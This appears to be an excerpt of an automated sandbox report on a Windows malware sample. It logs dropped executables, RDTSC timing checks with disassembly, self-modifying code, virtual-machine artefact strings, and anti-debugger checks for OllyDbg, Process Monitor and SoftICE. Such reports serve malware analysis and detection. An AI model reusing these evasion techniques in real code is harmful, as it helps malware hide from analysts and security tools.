Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0612 second address: 4BC0617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BC0617 second address: 4BC065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F2A63893312h 0x0000000f pushad 0x00000010 mov eax, 788285CDh 0x00000015 pushad 0x00000016 call 00007F29F0CD52A8h 0x0000001b pop esi 0x0000001c mov si, dx 0x0000001f popad 0x00000020 popad 0x00000021 test bl, 00000007h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push esi 0x00000028 pop ebx 0x00000029 mov ax, E3E1h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF002C second address: 4BF0087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C5275Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F29F0C5275Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushfd 0x00000015 jmp 00007F29F0C5275Dh 0x0000001a xor ax, 8026h 0x0000001f jmp 00007F29F0C52761h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29F0C5275Dh 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF0087 second address: 4BF00BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F29F0CD52A3h 0x00000011 popad 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF00BB second address: 4BF00C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 2904h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF00C4 second address: 4BF00E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF00E1 second address: 4BF00FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F29F0C5275Fh 0x00000011 mov ebx, eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF00FF second address: 4BF0121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD52A2h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF0121 second address: 4BF0125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF0125 second address: 4BF012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF012B second address: 4BF013F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 mov eax, 4CF7E1AFh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF013F second address: 4BF0143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF0143 second address: 4BF0147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | RDTSC instruction interceptor: First address: 4BF0147 second address: 4BF014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Special instruction interceptor: First address: 55DCA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Special instruction interceptor: First address: 382C34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Special instruction interceptor: First address: 5C35D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 27DCA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: A2C34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Special instruction interceptor: First address: 2E35D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Memory allocated: 2480000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Memory allocated: 2540000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Memory allocated: 4540000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Code function: 11_2_04C40DE6 rdtsc 11_2_04C40DE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 180000
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6128
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3460
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5054
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4778
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1093
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1138
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1056
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 552
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1091
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Window / User API: threadDelayed 1124
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | Window / User API: threadDelayed 420
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | Window / User API: threadDelayed 417
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141810101\CgmaT61.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\zY9sqWs[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\CgmaT61[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ADFoyxP[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141780101\yUI6F6C.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141830101\PfOHmro.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\yUI6F6C[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141790101\ADFoyxP.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\10141800101\zY9sqWs.exe
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\PfOHmro[1].exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe
Source: C:\Users\user\Desktop\random.exe | API coverage: 3.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2288 | Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 508 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6912 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7200 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7532 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7732 | Thread sleep count: 1093 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7732 | Thread sleep time: -2187093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7736 | Thread sleep count: 1138 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7736 | Thread sleep time: -2277138s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7708 | Thread sleep count: 1056 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7708 | Thread sleep time: -2113056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7556 | Thread sleep count: 552 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7556 | Thread sleep time: -16560000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7968 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7720 | Thread sleep count: 1091 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7720 | Thread sleep time: -2183091s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7724 | Thread sleep count: 1124 > 30
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe TID: 7724 | Thread sleep time: -2249124s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe TID: 2840 | Thread sleep time: -150000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0048DBBE
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0045C2A2 FindFirstFileExW,0_2_0045C2A2
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004968EE FindFirstFileW,FindClose,0_2_004968EE
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0049698F
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D076
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0048D3A9
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00499642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00499642
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0049979D
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00499B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00499B2B
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00495C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00495C97
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004242DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\789919\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\789919
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: rapes.exe, rapes.exe, 0000000E.00000001.1255577601.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000E.00000002.3642183042.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000002.1699197808.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000001.1644798172.0000000000232000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000019.00000002.2294579206.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000001B.00000002.2895467212.0000000000233000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.54.dr | Binary or memory string: VMware
Source: Amcache.hve.54.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.54.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.54.dr | Binary or memory string: VMware, Inc.
Source: powershell.exe, 00000008.00000002.1319444757.00000287A8EAC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\cal
Source: Amcache.hve.54.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.54.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.54.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.54.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000005.00000002.1219648140.0000000007319000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 0000000A.00000002.2865245242.0000021259A5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2864138394.000002125442B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000003.2603793681.0000000000FCD000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWXw!
Source: Amcache.hve.54.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.54.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.54.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.54.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000005.00000002.1219942069.0000000007390000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.54.dr | Binary or memory string: vmci.sys
Source: Amcache.hve.54.dr | Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: powershell.exe, 00000008.00000002.1319444757.00000287A8EAC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.54.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.54.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWP
Source: Amcache.hve.54.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                                    Source: Amcache.hve.54.drBinary or memory string: VMware20,1
                                    Source: Amcache.hve.54.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                    Source: Amcache.hve.54.drBinary or memory string: NECVMWar VMware SATA CD00
                                    Source: Amcache.hve.54.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                    Source: Amcache.hve.54.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                    Source: Amcache.hve.54.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                    Source: powershell.exe, 00000008.00000002.1319444757.00000287A8EAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                    Source: Amcache.hve.54.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                                    Source: Amcache.hve.54.drBinary or memory string: VMware PCI VMCI Bus Device
                                    Source: mshta.exe, 00000006.00000003.1183245797.00000148DA084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                                    Source: Amcache.hve.54.drBinary or memory string: VMware VMCI Bus Device
                                    Source: Amcache.hve.54.drBinary or memory string: VMware Virtual RAM
                                    Source: Amcache.hve.54.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000B.00000002.1267765693.0000000000513000.00000040.00000001.01000000.0000000E.sdmp, TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE, 0000000C.00000002.1305129221.0000000000513000.00000040.00000001.01000000.0000000E.sdmp, rapes.exe, 0000000D.00000002.1315429749.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000D.00000001.1253268397.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000E.00000001.1255577601.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000000E.00000002.3642183042.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000002.1699197808.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000016.00000001.1644798172.0000000000232000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 00000019.00000002.2294579206.0000000000233000.00000040.00000001.01000000.00000011.sdmp, rapes.exe, 0000001B.00000002.2895467212.0000000000233000.00000040.00000001.01000000.00000011.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                    Source: Amcache.hve.54.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXESystem information queried: ModuleInformationJump to behavior
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: regmonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: gbdyllo
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: procmon_window_class
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: ollydbg
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: filemonclass
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: NTICE
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: SICE
